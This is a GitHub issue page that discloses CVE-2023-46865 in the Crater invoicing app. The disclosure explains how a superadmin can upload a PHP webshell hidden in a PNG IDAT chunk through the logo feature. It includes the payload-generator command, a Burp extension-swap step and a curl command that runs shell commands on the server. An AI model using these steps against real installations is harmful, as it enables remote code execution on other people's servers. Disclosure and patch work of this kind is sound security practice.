-
Notifications
You must be signed in to change notification settings - Fork 1.6k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Post auth remote code exec as superadmin, CVE-2023-46865 #1267
Comments
have you tried emailing them, in case you haven't here are the instructions: https://github.com/crater-invoice/crater/security/policy |
@rihards-simanovics I have reached out to them in discord in april and they responded then. Im sure they are aware of it by now. |
@mohitpanjwani please review. |
This vulnerability has been assigned CVE-2023-46865, credit to my colleagues at NetbyteSEC for helping with the exploit. |
Description
This is a responsible disclosure. I've contacted the maintainers through huntr.dev on april and they have acknowledged the vulnerability but the project seems to be in maintanance for almost a year. I've given them 5 months to fix(they didnt respond after acknowledging it) and think I should let others be aware of this,
Describe the bug
In latest or 6.0.6 version of crater, superadmin is able to upload PHP file instead of an image using the Company Logo upload feature. The Base64Mime.php checking function can be bypassed by embedding a valid PHP payload into an IDAT image chunk. I have used https://github.com/huntergregal/PNG-IDAT-Payload-Generator for the poc.
python3 .\generate.py -m php -o test.png
Then use superadmin account to upload, change .png to .php in Burp .
Then
curl -XPOST -d '1=uname -a' 'http://localhost/storage/1/test.php?0=shell_exec' --output o && cat o
Expected behavior
Php file shouldnt be allowed to be uploaded. A whitelisting of extension should be used to prevent execution of php files.
Please complete the following information:
The text was updated successfully, but these errors were encountered: